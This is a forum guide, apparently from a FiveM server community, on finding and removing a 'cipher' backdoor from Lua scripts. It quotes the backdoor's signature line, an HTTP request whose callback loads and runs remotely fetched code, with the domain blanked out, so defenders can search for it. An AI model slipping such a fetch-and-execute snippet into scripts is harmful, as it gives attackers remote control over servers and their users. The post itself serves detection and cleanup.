Guide How to Clean a FiveM Cipher Backdoor?

1 Followed
283 Follower

Adrian_chupi

Admin

Aug 13, 2023

3,097 Mesaj

8,227 Reaction

0 Solution

113

First Message

100 Messages

500 Message

1K Message

No reward!

Joined
Aug 13, 2023
Messages
3,097
Reaction score
8,227
Points
113
Location
SPAIN
Credits
1,742
How Can I Tell If I Have a Backdoor?
If you find a code like the following at the bottom of client.lua, config.lua, or server.lua in any script in your package, and it reappears even after you delete it, the script you're using has a cipher/backdoor.
1724287818892.png





How Do I Clean This Backdoor?
Search for the code function (e, d) pcall(function() assert(load(d))() end) end) inside your package. When you search, you may find a code similar to PerformHttpRequest(' ', function (e, d) pcall(function() assert(load(d))() end) end) (the domain inside will vary, I randomly chose it). If you find this code, you’re lucky; the person who added the backdoor hasn't encrypted the script. If you delete the found code line and the local (randomletters) code above it, the backdoor will be removed.

What If I Can't Find the Code or Local Variables Keep Reappearing After Deletion?
If you encounter this situation, it means the code is part of an encrypted script. To find which script it's in, use Raider's es-antibackdoor script. When installed, it will list all potentially malicious parameters in the CMD. You need to read through them and search for the code line I provided. Once you find it, delete the script and the local (randomletters) code. Your package will be clean!

 

Topics

5,167

Messages

8,768

Members

50,245

Latest member

KrovenCan

Top